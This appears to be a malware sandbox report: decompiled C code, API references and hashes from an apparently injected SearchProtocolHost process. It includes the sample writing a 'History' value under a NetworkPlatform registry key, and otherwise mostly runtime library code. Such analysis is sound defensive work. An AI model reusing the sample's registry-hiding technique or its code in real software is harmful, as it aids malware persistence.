                                                0x02fa4cae
                                                0x02fa4cb4
                                                0x02fa4cb9
                                                0x02fa4cc7
                                                0x02fa4cd5
                                                0x02fa4cbb
                                                0x02fa4cbb
                                                0x00000000
                                                0x02fa4cbb
                                                0x02fa4cb9

                                                APIs
                                                • RegCreateKeyExA.ADVAPI32(80000002,Software\Microsoft\Windows NT\CurrentVersion\NetworkPlatform\Location,00000000,00000000,00000000,000F003F,00000000,00000000,00000801), ref: 02FA4C93
                                                • RegSetValueExA.ADVAPI32(00000000,History,00000000,00000003,?,?), ref: 02FA4CAE
                                                • RegCloseKey.ADVAPI32(00000000), ref: 02FA4CBB
                                                • RegCloseKey.ADVAPI32(00000000), ref: 02FA4CC7
                                                Strings
                                                • History, xrefs: 02FA4CA6
                                                • Software\Microsoft\Windows NT\CurrentVersion\NetworkPlatform\Location, xrefs: 02FA4C89
                                                Memory Dump Source
                                                • Source File: 00000015.00000002.723617375.0000000002FA0000.00000040.00000400.00020000.00000000.sdmp, Offset: 02FA0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_21_2_2fa0000_SearchProtocolHost.jbxd
                                                Similarity
                                                • API ID: Close$CreateValue
                                                • String ID: History$Software\Microsoft\Windows NT\CurrentVersion\NetworkPlatform\Location
                                                • API String ID: 1009429713-664128107
                                                • Opcode ID: bf684f9cf543056f35c4064a3c94f9967707086112fae1e8de49bd74e0888db2
                                                • Instruction ID: 02f6dca6a2245b55fe4ed3e6294f0a8721edbd647a9524bc7bf1b8b20167e5ec
                                                • Opcode Fuzzy Hash: bf684f9cf543056f35c4064a3c94f9967707086112fae1e8de49bd74e0888db2
                                                • Instruction Fuzzy Hash: 6FF06870BC020DBBEF209F90DD06FA9B77CFB04B55F600554BE09F6180D7B1A6249695
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 02FC1654 Relevance: 9.3, APIs: 6, Instructions: 300COMMONLIBRARYCODE
                                                Download Yara Rule
                                                C-Code - Quality: 77%
                                                			E02FC1654(signed int _a4, void* _a8, unsigned int _a12) {
				signed int _v5;
				char _v6;
				void* _v12;
				unsigned int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				void* _v32;
				long _v36;
				void* _v40;
				long _v44;
				signed int* _t143;
				signed int _t145;
				intOrPtr _t149;
				signed int _t153;
				signed int _t155;
				signed char _t157;
				unsigned int _t158;
				intOrPtr _t162;
				void* _t163;
				signed int _t164;
				signed int _t167;
				long _t168;
				intOrPtr _t175;
				signed int _t176;
				intOrPtr _t178;
				signed int _t180;
				signed int _t184;
				char _t191;
				char* _t192;
				char _t199;
				char* _t200;
				signed char _t211;
				signed int _t213;
				long _t215;
				signed int _t216;
				char _t218;
				signed char _t222;
				signed int _t223;
				unsigned int _t224;
				intOrPtr _t225;
				unsigned int _t229;
				signed int _t231;
				signed int _t232;
				signed int _t233;
				signed int _t234;
				signed int _t235;
				signed char _t236;
				signed int _t237;
				signed int _t239;
				signed int _t240;
				signed int _t241;
				signed int _t242;
				signed int _t246;
				void* _t248;
				void* _t249;

				_t213 = _a4;
				if(_t213 != 0xfffffffe) {
					__eflags = _t213;
					if(_t213 < 0) {
						L58:
						_t143 = E02FB5D30();
						 *_t143 =  *_t143 & 0x00000000;
						__eflags =  *_t143;
						 *((intOrPtr*)(E02FB5D43())) = 9;
						L59:
						_t145 = E02FB5C10();
						goto L60;
					}
					__eflags = _t213 -  *0x2fd6680;
					if(_t213 >=  *0x2fd6680) {
						goto L58;
					}
					_v24 = 1;
					_t239 = _t213 >> 6;
					_t235 = (_t213 & 0x0000003f) * 0x30;
					_v20 = _t239;
					_t149 =  *((intOrPtr*)(0x2fd6480 + _t239 * 4));
					_v28 = _t235;
					_t222 =  *((intOrPtr*)(_t235 + _t149 + 0x28));
					_v5 = _t222;
					__eflags = _t222 & 0x00000001;
					if((_t222 & 0x00000001) == 0) {
						goto L58;
					}
					_t223 = _a12;
					__eflags = _t223 - 0x7fffffff;
					if(_t223 <= 0x7fffffff) {
						__eflags = _t223;
						if(_t223 == 0) {
							L57:
							return 0;
						}
						__eflags = _v5 & 0x00000002;
						if((_v5 & 0x00000002) != 0) {
							goto L57;
						}
						__eflags = _a8;
						if(_a8 == 0) {
							goto L6;
						}
						_t153 =  *((intOrPtr*)(_t235 + _t149 + 0x29));
						_v5 = _t153;
						_v32 =  *((intOrPtr*)(_t235 + _t149 + 0x18));
						_t246 = 0;
						_t155 = _t153 - 1;
						__eflags = _t155;
						if(_t155 == 0) {
							_t236 = _v24;
							_t157 =  !_t223;
							__eflags = _t236 & _t157;
							if((_t236 & _t157) != 0) {
								_t158 = 4;
								_t224 = _t223 >> 1;
								_v16 = _t158;
								__eflags = _t224 - _t158;
								if(_t224 >= _t158) {
									_t158 = _t224;
									_v16 = _t224;
								}
								_t246 = E02FB7882(_t224, _t158);
								E02FB7848(0);
								E02FB7848(0);
								_t249 = _t248 + 0xc;
								_v12 = _t246;
								__eflags = _t246;
								if(_t246 != 0) {
									_t162 = E02FC09B4(_t213, 0, 0, _v24);
									_t225 =  *((intOrPtr*)(0x2fd6480 + _t239 * 4));
									_t248 = _t249 + 0x10;
									_t240 = _v28;
									 *((intOrPtr*)(_t240 + _t225 + 0x20)) = _t162;
									_t163 = _t246;
									 *(_t240 + _t225 + 0x24) = _t236;
									_t235 = _t240;
									_t223 = _v16;
									L21:
									_t241 = 0;
									_v40 = _t163;
									_t215 =  *((intOrPtr*)(0x2fd6480 + _v20 * 4));
									_v36 = _t215;
									__eflags =  *(_t235 + _t215 + 0x28) & 0x00000048;
									_t216 = _a4;
									if(( *(_t235 + _t215 + 0x28) & 0x00000048) != 0) {
										_t218 =  *((intOrPtr*)(_t235 + _v36 + 0x2a));
										_v6 = _t218;
										__eflags = _t218 - 0xa;
										_t216 = _a4;
										if(_t218 != 0xa) {
											__eflags = _t223;
											if(_t223 != 0) {
												_t241 = _v24;
												 *_t163 = _v6;
												_t216 = _a4;
												_t232 = _t223 - 1;
												__eflags = _v5;
												_v12 = _t163 + 1;
												_v16 = _t232;
												 *((char*)(_t235 +  *((intOrPtr*)(0x2fd6480 + _v20 * 4)) + 0x2a)) = 0xa;
												if(_v5 != 0) {
													_t191 =  *((intOrPtr*)(_t235 +  *((intOrPtr*)(0x2fd6480 + _v20 * 4)) + 0x2b));
													_v6 = _t191;
													__eflags = _t191 - 0xa;
													if(_t191 != 0xa) {
														__eflags = _t232;
														if(_t232 != 0) {
															_t192 = _v12;
															_t241 = 2;
															 *_t192 = _v6;
															_t216 = _a4;
															_t233 = _t232 - 1;
															_v12 = _t192 + 1;
															_v16 = _t233;
															 *((char*)(_t235 +  *((intOrPtr*)(0x2fd6480 + _v20 * 4)) + 0x2b)) = 0xa;
															__eflags = _v5 - _v24;
															if(_v5 == _v24) {
																_t199 =  *((intOrPtr*)(_t235 +  *((intOrPtr*)(0x2fd6480 + _v20 * 4)) + 0x2c));
																_v6 = _t199;
																__eflags = _t199 - 0xa;
																if(_t199 != 0xa) {
																	__eflags = _t233;
																	if(_t233 != 0) {
																		_t200 = _v12;
																		_t241 = 3;
																		 *_t200 = _v6;
																		_t216 = _a4;
																		_t234 = _t233 - 1;
																		__eflags = _t234;
																		_v12 = _t200 + 1;
																		_v16 = _t234;
																		 *((char*)(_t235 +  *((intOrPtr*)(0x2fd6480 + _v20 * 4)) + 0x2c)) = 0xa;
																	}
																}
															}
														}
													}
												}
											}
										}
									}
									_t164 = E02FBF33A(_t216);
									__eflags = _t164;
									if(_t164 == 0) {
										L41:
										_v24 = 0;
										L42:
										_t167 = ReadFile(_v32, _v12, _v16,  &_v36, 0);
										__eflags = _t167;
										if(_t167 == 0) {
											L53:
											_t168 = GetLastError();
											_t241 = 5;
											__eflags = _t168 - _t241;
											if(_t168 != _t241) {
												__eflags = _t168 - 0x6d;
												if(_t168 != 0x6d) {
													L37:
													E02FB5D0D(_t168);
													goto L38;
												}
												_t242 = 0;
												goto L39;
											}
											 *((intOrPtr*)(E02FB5D43())) = 9;
											 *(E02FB5D30()) = _t241;
											goto L38;
										}
										_t229 = _a12;
										__eflags = _v36 - _t229;
										if(_v36 > _t229) {
											goto L53;
										}
										_t242 = _t241 + _v36;
										__eflags = _t242;
										L45:
										_t237 = _v28;
										_t175 =  *((intOrPtr*)(0x2fd6480 + _v20 * 4));
										__eflags =  *(_t237 + _t175 + 0x28) & 0x00000080;
										if(( *(_t237 + _t175 + 0x28) & 0x00000080) != 0) {
											__eflags = _v5 - 2;
											if(_v5 == 2) {
												__eflags = _v24;
												_push(_t242 >> 1);
												_push(_v40);
												_push(_t216);
												if(_v24 == 0) {
													_t176 = E02FC11B0();
												} else {
													_t176 = E02FC14C0();
												}
											} else {
												_t230 = _t229 >> 1;
												__eflags = _t229 >> 1;
												_t176 = E02FC1370(_t229 >> 1, _t229 >> 1, _t216, _v12, _t242, _a8, _t230);
											}
											_t242 = _t176;
										}
										goto L39;
									}
									_t231 = _v28;
									_t178 =  *((intOrPtr*)(0x2fd6480 + _v20 * 4));
									__eflags =  *(_t231 + _t178 + 0x28) & 0x00000080;
									if(( *(_t231 + _t178 + 0x28) & 0x00000080) == 0) {
										goto L41;
									}
									_t180 = GetConsoleMode(_v32,  &_v44);
									__eflags = _t180;
									if(_t180 == 0) {
										goto L41;
									}
									__eflags = _v5 - 2;
									if(_v5 != 2) {
										goto L42;
									}
									_t184 = ReadConsoleW(_v32, _v12, _v16 >> 1,  &_v36, 0);
									__eflags = _t184;
									if(_t184 != 0) {
										_t229 = _a12;
										_t242 = _t241 + _v36 * 2;
										goto L45;
									}
									_t168 = GetLastError();
									goto L37;
								} else {
									 *((intOrPtr*)(E02FB5D43())) = 0xc;
									 *(E02FB5D30()) = 8;
									L38:
									_t242 = _t241 | 0xffffffff;
									__eflags = _t242;
									L39:
									E02FB7848(_t246);
									return _t242;
								}
							}
							L15:
							 *(E02FB5D30()) =  *_t206 & _t246;
							 *((intOrPtr*)(E02FB5D43())) = 0x16;
							E02FB5C10();
							goto L38;
						}
						__eflags = _t155 != 1;
						if(_t155 != 1) {
							L13:
							_t163 = _a8;
							_v16 = _t223;
							_v12 = _t163;
							goto L21;
						}
						_t211 =  !_t223;
						__eflags = _t211 & 0x00000001;
						if((_t211 & 0x00000001) == 0) {
							goto L15;
						}
						goto L13;
					}
					L6:
					 *(E02FB5D30()) =  *_t151 & 0x00000000;
					 *((intOrPtr*)(E02FB5D43())) = 0x16;
					goto L59;
				} else {
					 *(E02FB5D30()) =  *_t212 & 0x00000000;
					_t145 = E02FB5D43();
					 *_t145 = 9;
					L60:
					return _t145 | 0xffffffff;
				}
			}



























































                                                0x02fc165d
                                                0x02fc1664
                                                0x02fc167e
                                                0x02fc1680
                                                0x02fc19e8
                                                0x02fc19e8
                                                0x02fc19ed
                                                0x02fc19ed
                                                0x02fc19f5
                                                0x02fc19fb
                                                0x02fc19fb
                                                0x00000000
                                                0x02fc19fb
                                                0x02fc1686
                                                0x02fc168c
                                                0x00000000
                                                0x00000000
                                                0x02fc1694
                                                0x02fc16a0
                                                0x02fc16a3
                                                0x02fc16a6
                                                0x02fc16a9
                                                0x02fc16b0
                                                0x02fc16b3
                                                0x02fc16b7
                                                0x02fc16ba
                                                0x02fc16bd
                                                0x00000000
                                                0x00000000
                                                0x02fc16c3
                                                0x02fc16c6
                                                0x02fc16cc
                                                0x02fc16e6
                                                0x02fc16e8
                                                0x02fc19e4
                                                0x00000000
                                                0x02fc19e4
                                                0x02fc16ee
                                                0x02fc16f2
                                                0x00000000
                                                0x00000000
                                                0x02fc16f8
                                                0x02fc16fc
                                                0x00000000
                                                0x00000000
                                                0x02fc1703
                                                0x02fc1707
                                                0x02fc170a
                                                0x02fc170d
                                                0x02fc1712
                                                0x02fc1712
                                                0x02fc1715
                                                0x02fc1732
                                                0x02fc1737
                                                0x02fc1739
                                                0x02fc173b
                                                0x02fc175b
                                                0x02fc175c
                                                0x02fc175e
                                                0x02fc1761
                                                0x02fc1763
                                                0x02fc1765
                                                0x02fc1767
                                                0x02fc1767
                                                0x02fc1772
                                                0x02fc1774
                                                0x02fc177b
                                                0x02fc1780
                                                0x02fc1783
                                                0x02fc1786
                                                0x02fc1788
                                                0x02fc17ad
                                                0x02fc17b2
                                                0x02fc17b9
                                                0x02fc17bc
                                                0x02fc17bf
                                                0x02fc17c3
                                                0x02fc17c5
                                                0x02fc17c9
                                                0x02fc17cb
                                                0x02fc17ce
                                                0x02fc17d1
                                                0x02fc17d3
                                                0x02fc17d6
                                                0x02fc17dd
                                                0x02fc17e0
                                                0x02fc17e5
                                                0x02fc17e8
                                                0x02fc17f1
                                                0x02fc17f5
                                                0x02fc17f8
                                                0x02fc17fb
                                                0x02fc17fe
                                                0x02fc1804
                                                0x02fc1806
                                                0x02fc180f
                                                0x02fc1812
                                                0x02fc1815
                                                0x02fc1818
                                                0x02fc1819
                                                0x02fc181d
                                                0x02fc1823
                                                0x02fc182d
                                                0x02fc1832
                                                0x02fc1842
                                                0x02fc1846
                                                0x02fc1849
                                                0x02fc184b
                                                0x02fc184d
                                                0x02fc184f
                                                0x02fc1851
                                                0x02fc1859
                                                0x02fc185a
                                                0x02fc185d
                                                0x02fc1860
                                                0x02fc1861
                                                0x02fc1867
                                                0x02fc1871
                                                0x02fc1879
                                                0x02fc187c
                                                0x02fc1888
                                                0x02fc188c
                                                0x02fc188f
                                                0x02fc1891
                                                0x02fc1893
                                                0x02fc1895
                                                0x02fc1897
                                                0x02fc189f
                                                0x02fc18a0
                                                0x02fc18a3
                                                0x02fc18a6
                                                0x02fc18a6
                                                0x02fc18a7
                                                0x02fc18ad
                                                0x02fc18b7
                                                0x02fc18b7
                                                0x02fc1895
                                                0x02fc1891
                                                0x02fc187c
                                                0x02fc184f
                                                0x02fc184b
                                                0x02fc1832
                                                0x02fc1806
                                                0x02fc17fe
                                                0x02fc18bd
                                                0x02fc18c3
                                                0x02fc18c5
                                                0x02fc1938
                                                0x02fc1938
                                                0x02fc193c
                                                0x02fc194c
                                                0x02fc1952
                                                0x02fc1954
                                                0x02fc19b0
                                                0x02fc19b0
                                                0x02fc19b8
                                                0x02fc19b9
                                                0x02fc19bb
                                                0x02fc19d4
                                                0x02fc19d7
                                                0x02fc1914
                                                0x02fc1915
                                                0x00000000
                                                0x02fc191a
                                                0x02fc19dd
                                                0x00000000
                                                0x02fc19dd
                                                0x02fc19c2
                                                0x02fc19cd
                                                0x00000000
                                                0x02fc19cd
                                                0x02fc1956
                                                0x02fc1959
                                                0x02fc195c
                                                0x00000000
                                                0x00000000
                                                0x02fc195e
                                                0x02fc195e
                                                0x02fc1961
                                                0x02fc1964
                                                0x02fc1967
                                                0x02fc196e
                                                0x02fc1973
                                                0x02fc1975
                                                0x02fc1979
                                                0x02fc1994
                                                0x02fc1998
                                                0x02fc1999
                                                0x02fc199c
                                                0x02fc199d
                                                0x02fc19a9
                                                0x02fc199f
                                                0x02fc199f
                                                0x02fc199f
                                                0x02fc197b
                                                0x02fc197b
                                                0x02fc197b
                                                0x02fc1986
                                                0x02fc198b
                                                0x02fc198e
                                                0x02fc198e
                                                0x00000000
                                                0x02fc1973
                                                0x02fc18ca
                                                0x02fc18cd
                                                0x02fc18d4
                                                0x02fc18d9
                                                0x00000000
                                                0x00000000
                                                0x02fc18e2
                                                0x02fc18e8
                                                0x02fc18ea
                                                0x00000000
                                                0x00000000
                                                0x02fc18ec
                                                0x02fc18f0
                                                0x00000000
                                                0x00000000
                                                0x02fc1904
                                                0x02fc190a
                                                0x02fc190c
                                                0x02fc1930
                                                0x02fc1933
                                                0x00000000
                                                0x02fc1933
                                                0x02fc190e
                                                0x00000000
                                                0x02fc178a
                                                0x02fc178f
                                                0x02fc179a
                                                0x02fc191b
                                                0x02fc191b
                                                0x02fc191b
                                                0x02fc191e
                                                0x02fc191f
                                                0x00000000
                                                0x02fc1927
                                                0x02fc1788
                                                0x02fc173d
                                                0x02fc1742
                                                0x02fc1749
                                                0x02fc174f
                                                0x00000000
                                                0x02fc174f
                                                0x02fc1717
                                                0x02fc171a
                                                0x02fc1724
                                                0x02fc1724
                                                0x02fc1727
                                                0x02fc172a
                                                0x00000000
                                                0x02fc172a
                                                0x02fc171e
                                                0x02fc1720
                                                0x02fc1722
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x02fc1722
                                                0x02fc16ce
                                                0x02fc16d3
                                                0x02fc16db
                                                0x00000000
                                                0x02fc1666
                                                0x02fc166b
                                                0x02fc166e
                                                0x02fc1673
                                                0x02fc1a00
                                                0x00000000
                                                0x02fc1a00

                                                Memory Dump Source
                                                • Source File: 00000015.00000002.723617375.0000000002FA0000.00000040.00000400.00020000.00000000.sdmp, Offset: 02FA0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_21_2_2fa0000_SearchProtocolHost.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 3376599e1cd4072d04871c5594df8fb3123d133f340c993a9a3cb1d65de7228c
                                                • Instruction ID: 99a3f762ce40fc82b25e04245c6eb4f6903f93aa47aae6c1b55206c78ed93941
                                                • Opcode Fuzzy Hash: 3376599e1cd4072d04871c5594df8fb3123d133f340c993a9a3cb1d65de7228c
                                                • Instruction Fuzzy Hash: 1FC10675E0824A9FDF16DFA8CA50BEEBBB5AF09394F64054CD609A7382C3349951CF60
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 02FC0E01 Relevance: 9.1, APIs: 6, Instructions: 80COMMONLIBRARYCODE
                                                Download Yara Rule
                                                C-Code - Quality: 90%
                                                			E02FC0E01(char* _a4, short* _a8) {
				int _v8;
				void* __ecx;
				short* _t10;
				short* _t14;
				int _t15;
				short* _t16;
				void* _t26;
				int _t27;
				void* _t29;
				short* _t35;
				short* _t39;
				short* _t40;

				_push(_t29);
				if(_a4 != 0) {
					_t39 = _a8;
					__eflags = _t39;
					if(__eflags != 0) {
						_push(_t26);
						E02FB7D59(_t29, __eflags);
						asm("sbb ebx, ebx");
						_t35 = 0;
						_t27 = _t26 + 1;
						 *_t39 = 0;
						_t10 = MultiByteToWideChar(_t27, 0, _a4, 0xffffffff, 0, 0);
						_v8 = _t10;
						__eflags = _t10;
						if(_t10 != 0) {
							_t40 = E02FB7882(_t29, _t10 + _t10);
							__eflags = _t40;
							if(_t40 != 0) {
								_t15 = MultiByteToWideChar(_t27, 0, _a4, 0xffffffff, _t40, _v8);
								__eflags = _t15;
								if(_t15 != 0) {
									_t16 = _t40;
									_t40 = 0;
									_t35 = 1;
									__eflags = 1;
									 *_a8 = _t16;
								} else {
									E02FB5D0D(GetLastError());
								}
							}
							E02FB7848(_t40);
							_t14 = _t35;
						} else {
							E02FB5D0D(GetLastError());
							_t14 = 0;
						}
					} else {
						 *((intOrPtr*)(E02FB5D43())) = 0x16;
						E02FB5C10();
						_t14 = 0;
					}
					return _t14;
				}
				 *((intOrPtr*)(E02FB5D43())) = 0x16;
				E02FB5C10();
				return 0;
			}















                                                0x02fc0e06
                                                0x02fc0e0b
                                                0x02fc0e25
                                                0x02fc0e28
                                                0x02fc0e2a
                                                0x02fc0e43
                                                0x02fc0e45
                                                0x02fc0e4c
                                                0x02fc0e4e
                                                0x02fc0e57
                                                0x02fc0e58
                                                0x02fc0e5c
                                                0x02fc0e62
                                                0x02fc0e65
                                                0x02fc0e67
                                                0x02fc0e81
                                                0x02fc0e84
                                                0x02fc0e86
                                                0x02fc0e93
                                                0x02fc0e99
                                                0x02fc0e9b
                                                0x02fc0eaf
                                                0x02fc0eb1
                                                0x02fc0eb5
                                                0x02fc0eb5
                                                0x02fc0eb6
                                                0x02fc0e9d
                                                0x02fc0ea4
                                                0x02fc0ea9
                                                0x02fc0e9b
                                                0x02fc0eb9
                                                0x02fc0ebe
                                                0x02fc0e69
                                                0x02fc0e70
                                                0x02fc0e75
                                                0x02fc0e75
                                                0x02fc0e2c
                                                0x02fc0e31
                                                0x02fc0e37
                                                0x02fc0e3c
                                                0x02fc0e3c
                                                0x00000000
                                                0x02fc0ec3
                                                0x02fc0e12
                                                0x02fc0e18
                                                0x00000000

                                                Memory Dump Source
                                                • Source File: 00000015.00000002.723617375.0000000002FA0000.00000040.00000400.00020000.00000000.sdmp, Offset: 02FA0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_21_2_2fa0000_SearchProtocolHost.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: b30f83f482746986cab3cd8e2d5ff4edbe050e22d69607b59f07b110a9315c80
                                                • Instruction ID: 267e8b8d9af823e188c213fa209fbd460e0a43219ef089af45763eb4d37c2b0e
                                                • Opcode Fuzzy Hash: b30f83f482746986cab3cd8e2d5ff4edbe050e22d69607b59f07b110a9315c80
                                                • Instruction Fuzzy Hash: 4B11E7B2998116BFDB122F769D08EAB7A59EF857F0B60061DFA15D7240DF348901CAA0
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 02FB361C Relevance: 9.0, APIs: 6, Instructions: 48COMMONLIBRARYCODE
                                                Download Yara Rule
                                                C-Code - Quality: 100%
                                                			E02FB361C(void* __ecx) {
				void* _t5;
				void* _t6;
				void* _t9;
				void* _t15;
				long _t16;
				void* _t17;
				void* _t20;
				void* _t21;

				if( *0x2fd0450 != 0xffffffff) {
					_t16 = GetLastError();
					_t20 = E02FB3E33(__eflags,  *0x2fd0450);
					_t9 = _t15;
					__eflags = _t20;
					if(_t20 == 0) {
						_t21 = E02FB78D0(_t9, 1, 0x28);
						__eflags = _t21;
						if(__eflags == 0) {
							L6:
							SetLastError(_t16);
							_t17 = 0;
						} else {
							_t6 = E02FB3E6D(__eflags,  *0x2fd0450, _t21);
							__eflags = _t6;
							if(_t6 != 0) {
								SetLastError(_t16);
								_t17 = _t21;
								_t21 = 0;
								__eflags = 0;
							} else {
								goto L6;
							}
						}
						E02FB7848(_t21);
						_t5 = _t17;
					} else {
						SetLastError(_t16);
						_t5 = _t20;
					}
					return _t5;
				} else {
					return 0;
				}
			}











                                                0x02fb3623
                                                0x02fb3636
                                                0x02fb363d
                                                0x02fb363f
                                                0x02fb3640
                                                0x02fb3642
                                                0x02fb3658
                                                0x02fb365c
                                                0x02fb365e
                                                0x02fb3672
                                                0x02fb3673
                                                0x02fb3679
                                                0x02fb3660
                                                0x02fb3667
                                                0x02fb366e
                                                0x02fb3670
                                                0x02fb367e
                                                0x02fb3684
                                                0x02fb3686
                                                0x02fb3686
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x02fb3670
                                                0x02fb3689
                                                0x02fb368f
                                                0x02fb3644
                                                0x02fb3645
                                                0x02fb364b
                                                0x02fb364b
                                                0x02fb3693
                                                0x02fb3625
                                                0x02fb3627
                                                0x02fb3627

                                                APIs
                                                • GetLastError.KERNEL32(?,?,02FB3613,02FB29D1,02FCDD18,00000010,02FB219C,?,?,?,?,?,00000000,?), ref: 02FB362A
                                                • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 02FB3638
                                                • SetLastError.KERNEL32(00000000,00000000,?), ref: 02FB3645
                                                Memory Dump Source
                                                • Source File: 00000015.00000002.723617375.0000000002FA0000.00000040.00000400.00020000.00000000.sdmp, Offset: 02FA0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_21_2_2fa0000_SearchProtocolHost.jbxd
                                                Similarity
                                                • API ID: ErrorLast$Value___vcrt_
                                                • String ID:
                                                • API String ID: 483936075-0
                                                • Opcode ID: a22be44e00a5e78cde134c0919ed7d51e326e7b492e21924d26290b746bb579d
                                                • Instruction ID: c3fb58d7a410867c365dfd90c2aef46cac7a5fd993cc2328603b47852441b0db
                                                • Opcode Fuzzy Hash: a22be44e00a5e78cde134c0919ed7d51e326e7b492e21924d26290b746bb579d
                                                • Instruction Fuzzy Hash: D8F0D63BDC622556871322367D08EAE7652AF86BF1B610599E600E7280CF1068119BD0
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 02FB3060 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 115COMMON
                                                Download Yara Rule
                                                C-Code - Quality: 68%
                                                			E02FB3060(void* __ebx, intOrPtr* _a4, intOrPtr _a8, intOrPtr _a12) {
				char _v5;
				signed int _v12;
				char _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				long _v32;
				WCHAR* _v36;
				struct HINSTANCE__* _v40;
				void* __edi;
				void* __esi;
				void* _t54;
				long _t56;
				signed int _t62;
				intOrPtr _t63;
				void* _t64;
				intOrPtr _t67;
				long _t69;
				intOrPtr _t72;
				intOrPtr _t74;
				signed int _t76;
				char _t78;
				void* _t90;
				intOrPtr _t91;
				WCHAR* _t93;
				intOrPtr _t96;
				long _t98;
				intOrPtr* _t100;
				void* _t103;
				void* _t104;
				void* _t110;

				_t72 = _a8;
				_push(_t90);
				_v5 = 0;
				_t96 = _t72 + 0x10;
				_push(_t96);
				_v16 = 1;
				_v20 = _t96;
				_v12 =  *(_t72 + 8) ^  *0x2fcf008;
				_t54 = E02FB3020(_t90, _t96,  *(_t72 + 8) ^  *0x2fcf008);
				_t91 = _a12;
				_push(_t91);
				E02FB1802(_t54);
				_t56 = _a4;
				_t104 = _t103 + 0xc;
				if(( *(_t56 + 4) & 0x00000066) != 0) {
					__eflags =  *((intOrPtr*)(_t72 + 0xc)) - 0xfffffffe;
					if( *((intOrPtr*)(_t72 + 0xc)) != 0xfffffffe) {
						E02FB4097(_t72, 0xfffffffe, _t96, 0x2fcf008);
						goto L18;
					}
					goto L19;
				} else {
					_v32 = _t56;
					_v28 = _t91;
					_t91 =  *((intOrPtr*)(_t72 + 0xc));
					 *((intOrPtr*)(_t72 - 4)) =  &_v32;
					if(_t91 == 0xfffffffe) {
						L19:
						return _v16;
					} else {
						do {
							_t76 = _v12;
							_t19 = _t91 + 2; // 0x3
							_t62 = _t91 + _t19 * 2;
							_t74 =  *((intOrPtr*)(_t76 + _t62 * 4));
							_t63 = _t76 + _t62 * 4;
							_t77 =  *((intOrPtr*)(_t63 + 4));
							_v24 = _t63;
							if( *((intOrPtr*)(_t63 + 4)) == 0) {
								_t78 = _v5;
								goto L12;
							} else {
								_t64 = E02FB404E(_t77, _t96);
								_t78 = 1;
								_v5 = 1;
								_t110 = _t64;
								if(_t110 < 0) {
									_v16 = 0;
									L18:
									_push(_t96);
									E02FB3020(_t91, _t96, _v12);
									goto L19;
								} else {
									if(_t110 <= 0) {
										goto L12;
									} else {
										_t65 = _a4;
										if( *_a4 == 0xe06d7363) {
											_t112 =  *0x2fc55dc;
											if( *0x2fc55dc != 0) {
												_t65 = E02FC3930(_t112, 0x2fc55dc);
												_t104 = _t104 + 4;
												if(_t65 != 0) {
													_t100 =  *0x2fc55dc; // 0x2fb1e94
													L02FB162B();
													_t65 =  *_t100(_a4, 1);
													_t96 = _v20;
													_t104 = _t104 + 8;
												}
											}
										}
										E02FB407E(_t65, _a8, _a4);
										_t67 = _a8;
										if( *((intOrPtr*)(_t67 + 0xc)) != _t91) {
											E02FB4097(_t67, _t91, _t96, 0x2fcf008);
											_t67 = _a8;
										}
										_push(_t96);
										 *((intOrPtr*)(_t67 + 0xc)) = _t74;
										E02FB3020(_t91, _t96, _v12);
										E02FB4065();
										asm("int3");
										_push(_t96);
										_t98 = _v32;
										_push(_t91);
										_t93 = _v36;
										_t69 = GetModuleFileNameW(_v40, _t93, _t98);
										if(_t98 != 0) {
											if(_t69 == 0) {
												 *_t93 = 0;
											}
											if(_t69 == _t98) {
												_t69 = GetLastError();
												if(_t69 == 0) {
													 *(_t93 + _t98 * 2 - 2) = _t69;
												}
											}
										}
										return _t69;
									}
								}
							}
							goto L29;
							L12:
							_t91 = _t74;
							__eflags = _t74 - 0xfffffffe;
						} while (_t74 != 0xfffffffe);
						__eflags = _t78;
						if(_t78 != 0) {
							goto L18;
						}
						goto L19;
					}
				}
				L29:
			}


































                                                0x02fb3067
                                                0x02fb306b
                                                0x02fb306c
                                                0x02fb3073
                                                0x02fb307c
                                                0x02fb307e
                                                0x02fb3085
                                                0x02fb3088
                                                0x02fb308b
                                                0x02fb3090
                                                0x02fb3093
                                                0x02fb3094
                                                0x02fb3099
                                                0x02fb309c
                                                0x02fb30a3
                                                0x02fb315d
                                                0x02fb3161
                                                0x02fb3170
                                                0x00000000
                                                0x02fb3170
                                                0x00000000
                                                0x02fb30a9
                                                0x02fb30a9
                                                0x02fb30af
                                                0x02fb30b2
                                                0x02fb30b5
                                                0x02fb30bb
                                                0x02fb3181
                                                0x02fb318a
                                                0x02fb30c1
                                                0x02fb30c1
                                                0x02fb30c1
                                                0x02fb30c4
                                                0x02fb30c7
                                                0x02fb30ca
                                                0x02fb30cd
                                                0x02fb30d0
                                                0x02fb30d3
                                                0x02fb30d8
                                                0x02fb3140
                                                0x00000000
                                                0x02fb30da
                                                0x02fb30dc
                                                0x02fb30e1
                                                0x02fb30e3
                                                0x02fb30e6
                                                0x02fb30e8
                                                0x02fb3154
                                                0x02fb3175
                                                0x02fb3175
                                                0x02fb3179
                                                0x00000000
                                                0x02fb30ea
                                                0x02fb30ea
                                                0x00000000
                                                0x02fb30ec
                                                0x02fb30ec
                                                0x02fb30f5
                                                0x02fb30f7
                                                0x02fb30fe
                                                0x02fb3105
                                                0x02fb310a
                                                0x02fb310f
                                                0x02fb3111
                                                0x02fb311e
                                                0x02fb3123
                                                0x02fb3125
                                                0x02fb3128
                                                0x02fb3128
                                                0x02fb310f
                                                0x02fb30fe
                                                0x02fb3131
                                                0x02fb3136
                                                0x02fb313c
                                                0x02fb3195
                                                0x02fb319a
                                                0x02fb319a
                                                0x02fb319d
